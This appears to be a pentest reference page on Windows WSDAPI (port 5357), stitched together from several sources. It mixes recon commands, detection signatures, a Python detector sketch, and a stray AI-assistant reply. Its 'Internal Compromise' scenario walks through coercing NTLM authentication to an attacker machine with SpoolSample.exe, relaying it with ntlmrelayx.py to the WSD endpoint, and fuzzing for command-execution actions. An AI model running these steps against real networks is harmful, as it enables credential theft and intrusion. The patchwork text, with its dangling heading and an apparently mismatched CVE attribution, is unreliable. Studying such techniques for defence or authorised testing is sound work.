Hacktricks - Port 5357

Port 5357: WSDAPI Enumeration and Penetration Testing

Port 5357 (TCP) is primarily used by the Web Services for Devices API (WSDAPI), Microsoft's implementation of the WS-Discovery protocol. It allows Windows systems to automatically discover and communicate with network-connected devices like printers, scanners, and file shares over HTTP. In a penetration testing context, this port is often a target for fingerprinting Windows environments or exploiting legacy memory corruption vulnerabilities.

Service Overview

WSDAPI facilitates a "plug-and-play" network experience. It typically utilizes:

  • TCP Port 5357: HTTP-based communication.
  • TCP Port 5358: HTTPS-based communication (secure channel).
  • UDP Port 3702: Multicast discovery (WS-Discovery).

The service is generally active on Windows Vista, Windows 7, Windows 10, and Windows Server 2008 and later.

Enumeration and Information Gathering

During a network assessment, port 5357 is highly useful for fingerprinting the target system.

1. Nmap Scanning

You can use Nmap to identify the service and its version. Since it runs over HTTP, standard service discovery flags are effective:

nmap -p 5357 -sV <target>

Nmap typically identifies this as http or microsoft-httpapi. If the port appears open on every host in a subnet, it may be due to network-level forwarding or a firewall configuration rather than the service actually being active on every individual host.

2. Service Metadata

WSDAPI can leak significant metadata that aids in lateral movement:

  • Hostnames and computer names.
  • Device metadata such as printer models or scanner types.
  • Network paths and file share locations.

Known Vulnerabilities and Exploitation

MS09-063: Memory Corruption (CVE-2009-2512)

One of the most critical vulnerabilities associated with WSDAPI is a stack-based buffer overflow.

Port 5357 – WSDAPI (Web Services for Devices) - PentestPad

I notice you're asking about "port 5357 hacktricks" — this likely refers to port 5357 and its potential relevance in penetration testing or security research, possibly documented on the HackTricks platform.

Here’s what I can tell you:

# Get service info
curl http://<target>:5357/

What is Port 5357?

Port 5357 is officially allocated to WSDAPI – Web Services for Devices on Windows. It is part of Microsoft’s implementation of the Devices Profile for Web Services (DPWS). Think of it as a "Plug and Play for the network" – devices (printers, scanners, media servers, IoT hubs) announce themselves and their capabilities via SOAP/HTTP.

By default, Windows 10/11, Server 2016/2019/2022 listen on 0.0.0.0:5357 when network discovery is enabled (turned on in "Network and Sharing Center").

✅ WSDAPI Buffer Overflow (CVE-2016-3238)

Older Windows versions (7, Server 2008 R2, early 2016) had an RCE via a crafted ProbeMatches message. Exploit code exists on Exploit-DB.

Practical reconnaissance commands (safe, non-destructive)

Do not run intrusive exploitation against systems you don’t own or have permission to test.

Recon Commands

# Check if open
nmap -p 5357 <target>

Example detection signatures (IDS/Suricata/snort)

  • HTTP requests to port 5357 containing SOAP actions like GetDeviceInformation or GetServices.
  • Large or malformed SOAP envelopes to :5357 (possible fuzzing/exploit attempts).
  • Unexpected POSTs to /Device or /wsd endpoints from unusual hosts.
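As an added illustration of the three signatures above (not code from the original page or from any IDS vendor), the following Python stand-in applies them to constructed HTTP requests destined for port 5357; the 8 KiB size threshold, the expected-client allowlist and the sample traffic are assumptions.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
SUSPICIOUS_ACTIONS = ("GetDeviceInformation", "GetServices")  # actions named in the signature list
MAX_ENVELOPE_BYTES = 8192              # assumed threshold for a "large" envelope
WSD_PATHS = ("/Device", "/wsd")
EXPECTED_CLIENTS = {"192.168.1.10"}    # assumed allowlist of hosts that normally speak WSD

@dataclass
class HttpRequest:
    src_ip: str
    dst_port: int
    method: str
    path: str
    body: str

def is_soap_envelope(body: str) -> bool:
    # Well-formed XML whose root element is a SOAP 1.2 Envelope
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return False
    return root.tag == f"{{{SOAP_NS}}}Envelope"

def classify(req: HttpRequest) -> list[str]:
    # Labels that fire for one request; an empty list means no signature matched
    if req.dst_port != 5357:
        return []
    alerts = []
    if any(action in req.body for action in SUSPICIOUS_ACTIONS):
        alerts.append("wsd-metadata-request")
    if req.body and (len(req.body) > MAX_ENVELOPE_BYTES or not is_soap_envelope(req.body)):
        alerts.append("oversized-or-malformed-soap")
    if req.method == "POST" and req.path.startswith(WSD_PATHS) and req.src_ip not in EXPECTED_CLIENTS:
        alerts.append("unexpected-wsd-post")
    return alerts

def envelope(action: str) -> str:
    return f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body><{action}/></s:Body></s:Envelope>'

# Constructed sample traffic, not captured from a real network
SAMPLES = [
    HttpRequest("192.168.1.10", 5357, "POST", "/wsd/endpoint", envelope("GetDeviceInformation")),
    HttpRequest("192.168.1.77", 5357, "POST", "/Device", envelope("Probe")),
    HttpRequest("192.168.1.77", 5357, "POST", "/wsd", "A" * 9000),
    HttpRequest("192.168.1.10", 5357, "GET", "/", ""),
]

def run_detections(requests=SAMPLES) -> list[list[str]]:
    return [classify(r) for r in requests]
```

Each label corresponds to one bullet above, so a single request can carry several labels, as the oversized non-XML POST from an unexpected host does.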

Scenario: Internal Compromise

You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.

Step 1: Coerce Authentication

Using SpoolSample.exe:

SpoolSample.exe TARGET-50 AttackerPC

This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.

Step 2: Relay to WSD

ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support

If successful, you might get device control or even SYSTEM.

Banner/info retrieval:

Step 3: Command Injection via WSD Action

Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).